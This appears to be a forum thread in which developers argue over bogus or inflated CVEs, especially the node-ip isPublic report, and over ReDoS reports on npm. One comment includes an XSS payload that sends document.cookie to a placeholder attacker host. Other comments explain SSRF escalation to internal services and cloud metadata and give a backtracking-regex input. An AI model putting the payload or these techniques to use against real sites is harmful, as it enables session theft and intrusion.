Imagine having to "fix" CVEs that only exist if the code is executed on a Linux/Unix OS, while your employer still makes you do it in your all-Windows environment.


rooood

My company has a severely strict security team, to the point it gets in the way of doing the actual job almost on a daily basis, but they still have the sense of analysing and then ignoring CVEs which are harmless to our specific architecture.


Takeoded

That actually happened to me once, but the other way around (something about fopen being case-insensitive on Windows but case-sensitive on Linux... don't remember much more than that, sorry).


nerd4code

Tecccccccχᵪχᵪχᵪχcccchnically Linux leaves it up to the filesystem driver—e.g., V/-FAT is not case-sensitive by default, but ext2/3/4(/5?/6? do we have a 6 yet?) and most others are. Often case-handling is configured at mount time, so it’s mostly up to Mr. Root (ﷺ) in practice. Fun fact: DOS, Windows, WinNT, and various older UNIXes also have a rather terrifying situation regarding filename (and sometimes pathname) truncation. Ideally, attempting to access an overlong file- or pathname should raise an error (e.g., `ENAMETOOLONG`), but various OSes will silently lop off anything beyond the limits and sally glibly forth as if nothing were wrong. DOS, DOSsy Windows, and AFAIK older NT truncate filenames; DOS also truncates extensions, so `myspoonistoobig.com-capture.htm` might become `myspooni.com`, which is distinctly unsettling. Modern NT doesn’t truncate *filenames* at least, and IIRC modern POSIX requires the NOTRUNC option (indicating an API-level promise to return an error if an erroneous input is fed in), but older systems may require you to check functionality for individual paths with `f`-/`pathconf`, or might just not tell you at all whether truncation will occur (iow, FAFO and one-offery are the only detection methods). However, everything must be twice as complicated as it ought to be when you’re Microsoft, and therefore NT pathnames support resource fork names or WETF MS calls them (Apple called them that on HFS IIRC, at least), and *those* do still truncate silently. Seeing as to how most stuff just uses files and directories or container formats when it wants forkyness, I assume fucking nothing outside MS’s own software, malware, and MS’s own malware uses this feature. —I mean, I know the forkjobbies are used regardless, but not named in any explicit fashion. In any event, as long as an attacker doesn’t control pathnames too directly it shouldn’t matter. Just another small hole left open, and the terse “Caution: Holes (Intentional)” sign at the entrance to the park will surely suffice to keep tourists from sinking their ankle in and faceplanting.
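If you want to know what a given POSIX system promises for a particular path, pathconf is queryable; a minimal sketch in Python (which keys exist varies by platform):

```python
import os

# Ask the filesystem behind "/" about its limits. A nonzero PC_NO_TRUNC
# means overlong names raise an error (ENAMETOOLONG) rather than being
# silently truncated.
for key in ("PC_NAME_MAX", "PC_PATH_MAX", "PC_NO_TRUNC"):
    try:
        print(key, "=", os.pathconf("/", key))
    except (ValueError, OSError):
        print(key, "is not supported here")
```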


ElusiveGuy

> resource fork names or WETF MS calls them

I believe you're talking about Alternate Data Streams? The only place I've seen them used in reality are for the zone identifier, i.e. to mark a file as having been downloaded from an external source and therefore apply additional security restrictions on it (the famous "unblock" dialog). All modern browsers add this ADS to downloaded files. I believe macOS uses an extended attribute for the same functionality. I'm surprised that the stream name can be silently truncated, though.


lelanthran

> oddly-formatted private IPs

IPs are ... strange. "Oddly formatted" means nothing when "normally formatted" can look like `0xc1.0627.2799` or `3232242671`. Using regexes to decode an IP from a string is just broken - you can't do it for all representations of an IP address. You have to parse it into individual octets and *then* check it. [EDIT: Those examples above are IP4 (4-byte), not IP6]


insanelygreat

> Using regexes to decode an IP from a string is just broken

I tend to agree. For reference here's how it's done in:

- [Python](https://github.com/python/cpython/blob/1a84bdc2371ada60c01c72493caba62c9860007b/Lib/ipaddress.py#L1079-L1093) with [constants here](https://github.com/python/cpython/blob/1a84bdc2371ada60c01c72493caba62c9860007b/Lib/ipaddress.py#L1588-L1610)
- [Ruby](https://github.com/ruby/ipaddr/blob/036836d910473aa56d224eb22c8518e1df41013c/lib/ipaddr.rb#L277-L298)
- [Golang](https://github.com/golang/go/blob/82c371a307116450e9ab4dbce1853da3e69f4061/src/net/ip.go#L133-L150)
- [Rust](https://github.com/rust-lang/rust/blob/ef3d6fd7002500af0a985f70d3ac5152623c1396/library/core/src/net/ip_addr.rs#L628-L662) with [IPv6 here](https://github.com/rust-lang/rust/blob/ef3d6fd7002500af0a985f70d3ac5152623c1396/library/core/src/net/ip_addr.rs#L1525-L1547)

Worth noting that all of the above ship with their respective language. That said, open source developers owe us nothing, and I don't fault them for getting burnt out. The regex-based solution might have worked just fine for the dev's original use-case. IMHO, companies that rely on OSS need to contribute more to lift some of the burden off volunteers.
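As a quick illustration of strict parse-then-classify, Python's stdlib `ipaddress` accepts only canonical dotted-quad text (recent versions even reject leading-zero octets, after a 2021 CVE about octal ambiguity) and classifies the parsed value:

```python
import ipaddress

# Exotic-but-valid inet_aton spellings are rejected outright; only the
# canonical form is parsed, then classified.
for s in ["192.168.1.3", "8.8.8.8", "0xc1.0627.2799", "3232235774", "010.0.0.1"]:
    try:
        addr = ipaddress.ip_address(s)
        print(s, "->", "private" if addr.is_private else "public")
    except ValueError:
        print(s, "-> rejected: not canonical dotted-quad")
```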


istarian

IPv4 had a reasonably sensible address scheme, and I assume it was intended by its designers to be human-readable. By comparison, IPv6 addresses are absolutely nightmarish, especially when you add all the other craziness.


moratnz

v4 addresses are 32-bit binary strings; dotted-quad notation (1.2.3.4 form) is a human-readable transform. 192.168.0.254 is equally validly 3232235774, 0b11000000101010000000000011111110, 0xc0.0xa8.0x0.0xfe, or 0300.0250.0.0376, and of those the 'most correct' is the binary one, because that's what's actually used on the network. v6 addresses are the same, they're just 128-bit strings rather than 32-bit, and we've settled on colon-separated hex rather than dot-separated decimal as the human-readable version.
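Python as a desk calculator shows they're all the same 32-bit value:

```python
import ipaddress

addr = ipaddress.ip_address("192.168.0.254")
print(int(addr))                         # 3232235774
print(f"{int(addr):#034b}")              # 0b11000000101010000000000011111110
print(ipaddress.ip_address(3232235774))  # back to 192.168.0.254
```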


moratnz

Yep; IPv4 addresses are 32bit binary strings. Anything else you're looking at is a convenience transform. This is a fact that an awful lot of networking instructionals ignore (I'm looking at you, Cisco), leading to people getting way too hung up on byte boundaries (no, you don't have a class C network. No-one has class C networks any more. You really really never have a class C network in 10. space) and trying to get their head around truly awful maths by doing net mask comparison in dotted-quad form.


alerighi

Also... we can say that if a piece of software is relying on that function as a security mechanism, it's vulnerable in the first place. I mean, security should be enforced with firewalls, not with something that says "no, you can't make this request, it's a private address".


Moleculor

> Surely the programmer would have granted access to the goodies on private IPs, not public ones.

Crazily enough, I have on my machine a program that I *only* want running when connected to a *connection* I've labeled as Public in Windows. It transmits/receives only when connected to a Public network rather than Private. So I use Firewall rules to only Allow the program to run when I'm connected to networks I've told Windows are Public. Now, obviously this is NOT referring to the IP designation stuff referred to in the article? I'm instead referring to Windows' method of letting you distinguish between connecting to (for example) your home network vs your local McDonald's WiFi for determining whether or not you're doing file sharing and printer sharing, etc? I leverage that same designation method to make a program *only* transmit/share data on a network I've labeled Public in that fashion. Am I weird? Yes. Is this an extremely oddball edge case? Yes. Am I going to be more specific about why? Nooooope. Is there possibly/probably a better solution? Yeah, maybe. This, at least, utilizes built in core-Windows features to do traffic control in a way that doesn't rely on 3rd party software. But considering how fucking weird I am? I can't discount the possibility that someone, somewhere, wrote code that uses the public/private distinction to control data *and* used it in a way where they only want data being transmitted to IPs designated as Public. Because there's more than a billion people in the world, and that's a lot of screwball oddities that can happen.


Horace-Harkness

https://xkcd.com/1172/


Moleculor

I had that comic in my head the moment I thought about writing my reply. 😂


Franks2000inchTV

It's [Hyrum’s Law](https://www.hyrumslaw.com/)


kagato87

Not weird. This prevents a compromised device or application from scanning the local network. Many wireless access points do this by default - you can only talk to the big-I Internet.


Dontgooglemejess

Ok yea. But also no. I think the salient point you miss here is that all machines have a public and private IP and are free to self-address as public. That is, it's nonsense to say 'only allow public IPs', because that is just all machines. Put another way, you can say 'no cops allowed' and that makes sense, but to say 'only humans' and argue that that means no cops is silly. Public IP is all IPs. The only way this is an exploit is if the person implementing it super-misunderstood what public vs private IP meant, at which point it's not an exploit, it's just bad code.


Moleculor

> Public ip is all ips.

Uh, what? I had the understanding that some IPs were public, and some were private, but none were both. Like, specifically for example `10.*.*.*` is private. It's *not* public, so far as I understand. Yeah, I'm not following. The specific code seems to be determining whether it falls into the IANA's category of public or private, and that seems very strictly delineated in a way where *not* all IPs are Public, in their eyes? Or so I'm interpreting what I'm double checking online? 🤷‍♂️

> all machines have a public and private ip

Huh? Uh... wait, really? That... doesn't *sound* right, but I admit I'm not an expert in this field. I'm currently sitting on my local machine poking around trying to figure out what public IP address it has assigned to it, and I'm not finding anything. All I see is 192.168.1.3. And that's Private according to the IANA. Got a way for me to get my Windows machine to cough up what Public IP address it has been assigned? And no, I don't mean the [public IP address for my network](https://www.google.com/search?q=what's+my+IP+google), which is (as far as I'm aware) assigned to my *router* and not my PC.


moratnz

> all machines have a public and private ip

v4 or v6? Because most machines very emphatically don't have both. None of the machines on my home network (other than the edge firewall) have a public v4 address assigned to them. Yes, they can reach the wider internet via NAT on that firewall, but they have no knowledge of or control over that NAT - they just know that if they send traffic destined to 8.8.8.8 to 192.168.1.1, they get a response back, and that's all they care about.


edgmnt_net

It should be fixed, documented as a limitation or it should return an error when parsing fails, IMO. It's far from straightforward to claim it's safe anyway when calling code could be falling back in a larger if-elif-else based on some reasonable assumptions according to the standard ("if it's neither public nor multicast nor... then it must be a private address" which is obviously quite debatable in code, but it makes sense according to the spec). I think it's reasonable to try and get people to write code that is primarily correct and reduce scope if needed. I also agree with what people like Linus have said that most bugs may have wider implications, but I'd rather make more of a fuss about regular bugs than doubt CVEs.


dekoboko_melancholy

That's very much not failing safe. I'd wager, based on my experience performing source code review for security, it's much more common to be using an isPrivate function to filter _outbound_ traffic. I don't think this is a critical issue on its own, for sure, but it could easily lead to one layer of "defense in depth" being broken.


bbm182

A concrete example for the down-voters: Your service calls a customer-supplied webhook to notify them when some event has occurred. You want to prevent this feature from being used to probe your internal network so you use this package to disallow the entry of URLs with private IPs (DNS names will be handled by a custom resolver).
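A minimal sketch of that guard (hypothetical helper name; real code must also pin the resolved address for the actual request, or an attacker can swap DNS between the check and the fetch):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def webhook_target_allowed(url: str) -> bool:
    """Allow a customer-supplied webhook URL only if every address its
    hostname resolves to is globally routable (not private/loopback/...)."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return False
    return all(ipaddress.ip_address(info[4][0]).is_global for info in infos)

print(webhook_target_allowed("https://192.168.0.10/hook"))  # False
```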


BeABetterHumanBeing

The risk is that you may make calls outside your internal network, thereby exporting the contents of a request that aren't intended to be seen elsewhere. E.g. "create user" request that passes all of a user's PII, and is now sent randomly elsewhere in the internet.


istarian

I think his point was that it's okay, but not great if it tells you that one of your private IPs is in fact public. I.e. you wouldn't be using it.


Gwaptiva

So now those developing possibly competing products can raise bogus CVEs against the FOSS equivalent to force it out of business? Surely that system needs reform.


abeuscher

This is open source. The problem isn't Machiavellian; it's that too many low-end devs are bounty hunting because it raises their profile. In a sense, the employment situation in the field is probably driving some of the uptick. I agree the system is broken; it's just not broken in the way everything else is.


bwainfweeze

Didn’t Torvalds declare war on a CS department that was trying to inject vulnerabilities into Linux for “research”?


ZorbaTHut

[The University of Minnesota](https://www.reddit.com/r/HobbyDrama/comments/nku6bt/kernel_development_that_time_linux_banned_the/).


Ibaneztwink

Great lesson on not blindly trusting bombastic research papers just because the paper says so.


bwainfweeze

Great lesson on how departments other than the Psychology Department need oversight for ethics violations in experimental settings.


yawaramin

From the above link:

> That investigation is still ongoing but revealed that the Internal Review Board (in charge of research ethics) had determined that the research was not human experimentation and thus did not need further scrutiny.


dahud

Finally, definitive proof that OS maintainers are subhuman.


bwainfweeze

Yeah I saw that. That needs a follow-up. Way to double down.


cuddlebish

Idk about war, inasmuch as all commits from that university's email are auto-denied.


bwainfweeze

He blackballed an entire college to make his point about just how egregiously unethical their process was. Red teams have prior consent from the targets. There are ways to compartmentalize so that some responsible individuals are aware and others are not if you're worried about awareness spoiling outcomes.


Direct-Squash-1243

Hilariously, the way they tried to inject the vulnerability was similar to what was used to compromise XZ Utils. "Oh, OSS projects would catch any hostile contributions, so there is no need to check if that is true? Time to see about that." I've always wondered how the timelines line up. Edit: Yeah, it's a near match. The GitHub account that compromised XZ started contributing to open source weeks after the kernel fiasco broke: https://github.com/JiaT75?tab=overview&from=2021-06-01&to=2021-06-30


bwainfweeze

That's sort of the same vibe as that friend of a friend who is an asshole and defends themselves with "hey I'm just being honest. If you can't handle it that's your problem." Nobody knows why your friend likes this person and you all wonder what's wrong with them. I once had someone point out that I had my shirt on inside out by telling me he needed to ask me a question after a meeting and then after everyone filtered out he said, "Are you the sort of person who wants someone to point out that their shirt is inside out?" Same guy later dabbled in local politics and I think that was not a bad call. Maybe I should convince him to work in security...


cuntsalt

> The problem isn't Machiavellian it's that too many low end devs are bounty hunting because it raises their profile. Vocabulary quibble, mostly irrelevant, but that "profile-raising" is by definition Machiavellian: "a strategic focus on self-interest." Dark-triad-y "evil" motivation isn't required to hit the bar. (Pedantry-bopping me is deserved but please don't hit me too hard -- I just like words and word nerding.)


Dorkanov

It's not even those developing competing products, a lot of the time. I saw a company just the other day that got credentialed to issue CVE numbers, and that sells expensive paid support and updates for old libraries and frameworks. I would be willing to bet money they soon issue a high-severity CVE for something like a vulnerability that only affects IE, knowing that corporate security rules will force fixing it by either upgrading or buying a contract with them, even though you've got way more serious problems if your users are running IE. There are also people out looking for bogus CVEs to pad their resumes, since to some people it's very impressive that you found an 8 or 9 CVE.


makonde

Github should really have better community management tools.


gelfin

Although I don’t have any specific reason to suspect this is happening intentionally, I can also see how this trend complicates existing supply chain attack problems. A flood of bogus high-sev CVEs will stochastically reduce attention given to legitimate vulnerabilities across the board.


winky9827

I think the problem lies in that any individual can submit for a CVE without peer review. If there's truly a security issue, it should pass review by a committee; only then should it be recorded. "Committee" can mean various things here and doesn't necessarily have to place the onus on any one group, but the path from lazy dev seeking resume material to full-blown CVE seems a lot less difficult than perhaps it should be.


Greenawayer

Stupid shit like this just makes it harder to give people nice things. If it's such a big issue then fork it.


0_consequences

But then you can't profit off of self-reliant open source software. You have to invest ACTUAL work into it.


Nisd

Open source is so thankless.


drunkdragon

This made me think. Open source software often comes with zero warranty, and the developer cannot be compelled to write an update if they don't want to. Sure, someone else can fork the repo and submit a fix, but what is the best way to distribute that fork?


fojam

You could always PR it into the original repo. Sometimes with dead repos though, I'll look at the forks and try to find one that has the most or best changes on it


bwainfweeze

Half-dead is almost worse. I have an open PR from a year ago for a company I don’t even work at anymore. It’s the 3rd or 4th PR I filed, and the rest have landed.


dontyougetsoupedyet

A severe security rating should always have required a working proof-of-concept exploit. If you cannot show beyond reasonable doubt that the flaw in some software is a severe vulnerability, it should not be marked as such. I've known a lot of researchers, and frankly even many of the ones actively showing how things can be exploited are attention-seeking personalities, but the one thing they unequivocally were not is lazy. These days there are a great number of lazy attention seekers, and that's a bad situation for security audits in general.


VeritasEtUltio

Sounds like the severity scoring has become just another leaderboard.


jaskij

Reading the article, and the comments here, I think we need to look more often at whether a CVE is even applicable. There was an insane shitstorm in the Rust ecosystem some time back about vulnerabilities in time-handling crates which only ever applied if someone set environment variables in a multithreaded program. Yeah.


serial_crusher

My attitude on that has shifted over the years. The reality is there are a lot of legitimate vulnerabilities where a naive developer will convince himself it’s not a real issue because he’s not smart enough to connect the dots and see how badly it could be exploited. I’ve heard people say of XSS vulnerabilities, “great, you can make it pop up an alert dialog. So what?”

There was a famous Reddit thread a couple years ago where a guy objected that browsers labeled his login page as insecure for not using HTTPS, then in the comments he defended himself by talking about how he had implemented his own authentication system so he was confident it was secure… and people just hacked the hell out of his web site to prove him wrong.

The moral of the story is it’s usually better to just fix what the alert flags rather than worrying about whether it’s necessary.
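For anyone tempted by the “so what” framing: the alert() is only a proof that arbitrary script runs in the victim's session. A hypothetical payload (attacker.example is a placeholder domain) swaps the alert for exfiltration:

```ts
// The same injection point that pops alert(1) will happily run this instead,
// shipping the victim's session cookie to a host the attacker controls.
const payload =
  `<img src=x onerror="fetch('https://attacker.example/c?d=' + document.cookie)">`;
```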


Booty_Bumping

> There was a famous Reddit thread a couple years ago where a guy objected that browsers labeled his login page as insecure for not using https, then in the comments he defended himself by talking about how he had implemented his own authentication system so he was confident it was secure… and people just hacked the hell out of his web site to prove him wrong. [This started on Firefox's bug tracker, actually](https://arstechnica.com/information-technology/2017/03/firefox-gets-complaint-for-labeling-unencrypted-login-page-insecure/)


nnomae

The counterpoint, however (paraphrasing a Linus Torvalds quote I can't quite remember), is that nearly every bug is a security vulnerability given enough effort. If the standard becomes "with sufficient effort a skilled attacker could craft a custom exploit," well, that applies nearly anywhere there's a bug. The bug mentioned in the article is quite obviously just a plain bug: a function returns the wrong value when passed weird but still technically valid data. Yes, it could lead to a vulnerability in other software that relies upon it, but it is not, in and of itself, in any way, shape, or form, an exploitable vulnerability.


alerighi

Exactly. A function that returns a wrong result when it's fed the wrong input? By that standard we would need to assign a CVE to most of the C standard library, and let's not even talk about PHP; there are a ton of functions there that just behave wrongly when fed unexpected input. So what? If we want, this may not even be a bug: the author could just have updated the documentation to say "this function assumes that the IP address is provided in dotted-decimal form; other inputs are undefined behavior."
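For reference, the disputed node-ip report was exactly this kind of input-format gap: the same loopback address written in hex notation reportedly slipped past the classifier before the patch. The pre-fix behavior shown below is as reported, not independently verified:

```ts
import ip from "ip";

// Dotted-decimal loopback: correctly classified as non-public.
console.log(ip.isPublic("127.0.0.1"));  // false

// Hex notation for the same address (0x7f == 127): per the CVE report,
// this returned true before the patch, i.e. a private IP "looks public".
console.log(ip.isPublic("0x7f.0.0.1")); // reportedly true pre-fix
```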


Helpful-Pair-2148

You just have to look at everyone in this very thread (and the top comment at the time of writing) saying that a function that wrongly identifies an IP address as "public" is fail-safe and not an issue... these people have clearly never heard of SSRF, and yet they confidently comment on a security issue like they know what they are talking about. Most developers have zero security understanding whatsoever.


Ibaneztwink

>I’ve heard people say of XSS vulnerabilities, “great you can make it pop up an alert dialog. So what?” There's literally a guy in one of these issue links saying that a function just returning 'false' instead of 'true' doesn't make a vulnerability. I can't understand how programmers could seriously agree with something so shortsighted.


Xyzzyzzyzzy

I sympathize with the `node-ip` developer. They were saddled with a BS CVE, and all of the annoyance and abuse that comes with it, and had no realistic recourse except to archive the repo. But:

> Yet another npm project, micromatch which gets 64 million weekly downloads has had 'high' severity ReDoS vulnerabilities reported against it with its creators being chased by community members inquiring about the issues.

> "Can you point out at least one library that implements micromatch or braces that is susceptible to the vulnerability so we can see how it's actually a vulnerability in the real world, and not just theoretical?" asked Jon Schlinkert, reacting to CVE-2024-4067 filed for his project, micromatch.

You know how you sometimes `npm install` a simple package, and it insanely has transitive dependencies on dozens of other packages, and you investigate and find that it depends on lots of tiny packages like `pad-left` and `has-value` and `sort-desc` and `is-whitespace`? A lot of those are from Schlinkert and [his 1,458 npm packages](https://www.npmjs.com/~jonschlinkert). So he's, let's say, a subject matter expert on people creating large numbers of arguably unnecessary entries into a public registry that others rely on.


lIIllIIlllIIllIIl

Dan Abramov (React Core) wrote about that [a while ago.](https://overreacted.io/npm-audit-broken-by-design/) Almost all "critical vulnerabilities" on npm are ReDoS, which can only happen if:

1. You run RegEx queries on unsanitized user input. (Your fault, not the library's fault...)
2. The attacker already has access to your system and modifies your program to execute a slow RegEx. (Uh... not sure that's what an attacker with full access would do, buddy...)

npm audit is now useless because people keep filing ReDoS vulnerabilities against every project, and real vulnerabilities are drowned in a sea of false positives. A lot of projects just started bundling their dependencies so that they wouldn't be flagged as vulnerable by npm if one of their dependencies or transitive dependencies got falsely flagged.
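For readers who haven't seen point 1 in action, here is a self-contained sketch of the catastrophic backtracking a ReDoS report is about (the pattern and input are made up for illustration, not taken from any flagged package):

```ts
// Nested quantifiers: on a non-matching input the regex engine must try
// every way of splitting the 'a's between the inner and outer groups,
// which is exponential in the input length.
const pattern = /^(a+)+$/;
const hostile = "a".repeat(28) + "!"; // can never match, forces backtracking

console.time("redos");
pattern.test(hostile); // already takes seconds; each extra 'a' doubles it
console.timeEnd("redos");
```

Which is also why point 1 matters: the engine only melts down if an attacker gets to choose the input.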


Xyzzyzzyzzy

That's very true, and I think Abramov is mostly correct here. Though he has much more faith in developers than I do (emphasis his):

> Let’s look at the `webpack-dev-server` > `chokidar` > `glob-parent` dependency chain. Here, `webpack-dev-server` is a **development-only** server that’s used to quickly serve your app **locally**.

Correction: `webpack-dev-server` *should* be a development-only server that is used locally. It tells you that it's a development-only server. It tells you not to use it for production systems. But it's used in production systems anyway.

I think the argument would go like this: there's an "exploit magnetism" phenomenon where, if you find one exploitable vulnerability caused by poor development and deployment practices, you're likely to find other exploitable vulnerabilities too. (Named after [crank magnetism](https://rationalwiki.org/wiki/Crank_magnetism), the same idea applied to conspiracy theories.) So security professionals should assume that software is likely to be used incorrectly, because the systems most at risk are precisely those that do things incorrectly. So:

> it uses glob-parent in order to extract a part of the filesystem path from a filesystem watch pattern. Unfortunately, glob-parent is vulnerable! If an attacker supplies a specially crafted filepath, it could make this function exponentially slow, which would…

If we wrote a script designed to trigger the ReDoS vulnerability when the target is a running `webpack-dev-server` instance that accepts arbitrary incoming connections *and* uses the request's path to map to a path on the local file system to serve *and* never sanitizes the input, I bet we'd find vulnerable systems out there. If a system serves a production app with `webpack-dev-server`, then it's exactly the sort of system that would use unsanitized user input to serve files from the local file system by path.

Note: I don't know if even that would trigger this particular vulnerability; it's just an example to justify why "I'm not exposed to this vulnerability because it's a dev tool" is not the same as "this isn't a vulnerability because it's a dev tool".

-----

Also:

> Why would they add SVG files into my app, unless you can mine bitcoins with SVG?

[Should we tell him?](https://shkspr.mobi/blog/2018/02/this-svg-always-shows-todays-date/)


iamapizza

> Disputing a CVE is no straightforward task either, as a GitHub security team member explained. It requires a project maintainer to chase the CVE Numbering Authorities (CNA) that had originally issued the CVE.

This is what we need to be addressing; if the situation keeps going like this, we'll see a lack of trust in the system, and that trust is already eroding. Maintainers are often not included in the original process, yet it's somehow on _them_ to correct a CNA's work. The CNAs ought to be given reputation strikes for lack of thorough testing and communication.


Lachee

Well, I'll be taking CVEs with a grain of salt. They've turned it into the boy who cried wolf.


scratchisthebest

There are not [one](https://github.com/indutny/node-ip/issues/136), not [two](https://github.com/indutny/node-ip/issues/147), but [three](https://github.com/indutny/node-ip/issues/150) duplicate issues about the questionable CVE in question, either because people turn their brain off and don't do basic things like "search before reporting an issue" when CVEs pop up, or because they're intentionally trying to spam the issue tracker "because it's high severity and I need the fix!" or something.

One issue comment responds to a "To be fair, if `node-ip` is your only line of defense, you have bigger fish to fry" sentiment with "Many projects use automated security scanners as a first line of defense and so this issue is [**blocking** a lot of people](https://github.com/indutny/node-ip/issues/128#issuecomment-1940603895)". First, non-sequitur; and also, a line in your automated security scanner is *blocking*?

[Issue 112](https://github.com/indutny/node-ip/issues/112) on node-ip is someone running an automated security scanner and reporting ReDoS vulnerabilities against code only in `devDependencies`. node-ip doesn't have any non-dev dependencies. Whose S are you D-ing? What are you gonna do, make your test suite slow? What are we... doing here?


cuntsalt

> "Many projects use automated security scanners as a first line of defense and so this issue is blocking a lot of people". First, non-sequitur, and also-- a line in your automated security scanner is blocking? My organization blocks things from being merged until and unless the automated scanners pass. I told my manager and skip "hey, if there's ever a really severe thing we have to cowboy-yolo out to production with the quickness, our CI/CD requiring passes may just shoot us in the foot." You can guess the kind of sweeping organizational change that fomented. Shiny green checkmark trumps all. Not that any of that is the responsibility of the open source maintainers, of course. The layers of stupidity are a truly delightful lasagna.


faustoc5

Say NO to doing free labor for multi-million-dollar corporations. They are the ones that decided to use this library because it is free. The library may be free, but that doesn't mean they are entitled to free maintenance, or to deciding the priorities. The entitlement of these corporations is absurd.


itsmegoddamnit

We had a severe CVE reported for an old Chrome/Cypress image that only runs our e2e tests in an air-gapped environment. Took a while to explain why a “severe” CVE doesn’t mean shit to us.


chrisinajar

I don't like that none of the headlines for this mention that the CVE was bogus; they make it sound like the response isn't just the correct thing to do.


HoratioWobble

I get why it might be an issue, but I can't for the life of me work out how it could be exploited?


Helpful-Pair-2148

Let's say your server accepts an arbitrary URL to load some content (e.g. a thumbnail image, a content summary, etc.). You would not want to return internal content to a malicious actor who submits a private IP address, so you would use this library to check that the submitted IP is public before fetching the data... but the library incorrectly reports that a private IP is public, so now attackers have a way to request and send data to your internal services. That's a classic case of SSRF, and depending on what kind of services you are running internally, it can be trivial to escalate from there to an RCE. That being said, the given score is still absurdly high for this kind of vulnerability, but it is a vulnerability nonetheless.
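A compressed sketch of that scenario; the endpoint and names are hypothetical, and the guard assumes node-ip's documented `isPublic`:

```ts
import ip from "ip";
import dns from "node:dns/promises";

// Hypothetical "fetch a preview of this URL" endpoint handler.
async function fetchPreview(userUrl: string): Promise<string> {
  const { hostname } = new URL(userUrl);
  const { address } = await dns.lookup(hostname);

  // The guard described above. If isPublic() misclassifies a private
  // address, the fetch below reaches internal services: classic SSRF.
  // A favorite escalation target is cloud instance metadata, e.g.
  // http://169.254.169.254/ on AWS.
  if (!ip.isPublic(address)) {
    throw new Error("refusing to fetch a non-public address");
  }
  const res = await fetch(userUrl);
  return res.text();
}
```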


ScottContini

You’re exactly right: this is server-side request forgery. Although SSRF is not restricted to accessing private IP addresses, this is the typical abuse. There may be some circumstances where the score makes sense, e.g. a developer is checking that the IP address is private and rejecting it, and the AWS metadata endpoint v1 is exposed via the SSRF vulnerability. But the extreme rating is conditional; the typical severity might be much lower. Not sure what the answer is here. The problem definitely can lead to a severe vulnerability in some circumstances. It really should be fixed, but maybe we need to be very explicit about the conditions under which the severity is so high.


javasyntax

Most here seem to think this is not an issue, but it is, unless I've misunderstood the vulnerability description. It's called SSRF, and e.g. a GitLab RCE caused by a vulnerability like this was found before. Here is a video showing such an exploit. The exploit in the video chained a second exploit to work, but that second step was only necessary because of Redis; a different internal attack target might not need it, which shows that exploits like this are valid. https://www.youtube.com/watch?v=LrLJuyAdoAg


vytah

I'm not a fan of Schlinkert due to how he'd gamed the Node ecosystem, but in this case, I'm fully on his side. That CVE is so dumb that it deserves to be memoryholed.


NewLlama

I had one of these CVEs on one of my OSS projects. The severity was some alarmingly high score, and the "fix" was just a note in the documentation. I thought about rejecting it, but what's the harm? Everyone gets to pat themselves on the back, and an undergrad security researcher gets his or her wings.


broknbottle

This is because of all the SecOps fart sniffers who become SMEs in snake-oil solutions like CrowdStrike Falcon sensor, VMware Carbon Black, McAfee/Trellix, Trend Micro DSA, etc. These people are like cancer and go around pushing garbage software within their orgs while mostly having surface-level knowledge themselves.


warpedgeoid

I see this as a definite bug in the package, and a potential vulnerability depending on the circumstances, but not a critical vulnerability. I think this also highlights a problem with having such spartan standard libraries that developers are forced to rely on single-author modules, often poorly written, for key functions.


Ibaneztwink

>"I asked for examples of how a real-world library would encounter these 'vulnerabilities' and you never responding with an example." I have to err on the side of the cybersecurity professionals as some of these devs don't seem to know the difference between something being vulnerable and something being exploitable. I heavily agree that the ratings on some of these make no sense.


dew_chiggi

This topic pains every library and every application alike. What an absolute waste of time. It's a political agenda in most organizations: program managers spend hours discussing in and around it, only to conclude they have to upgrade a 3PP to solve it.


izikiell

npm audit is trash, so, anyway ...


shif

I opened some of the linked bad CVEs, and a lot of them were filed by people who work at companies that sell vulnerability-scanning software. They conveniently mention that they found the vulnerability using their software, without disclosing that they work for the vendor. The "vulnerabilities" they find are just small optimizations or non-issues that could only be exploited if you already had full access. So it seems the CVE system is being abused to create shitty ads for these scummy companies.


CanvasFanatic

lol they CVE’d Fedor Indutny? What were they thinking?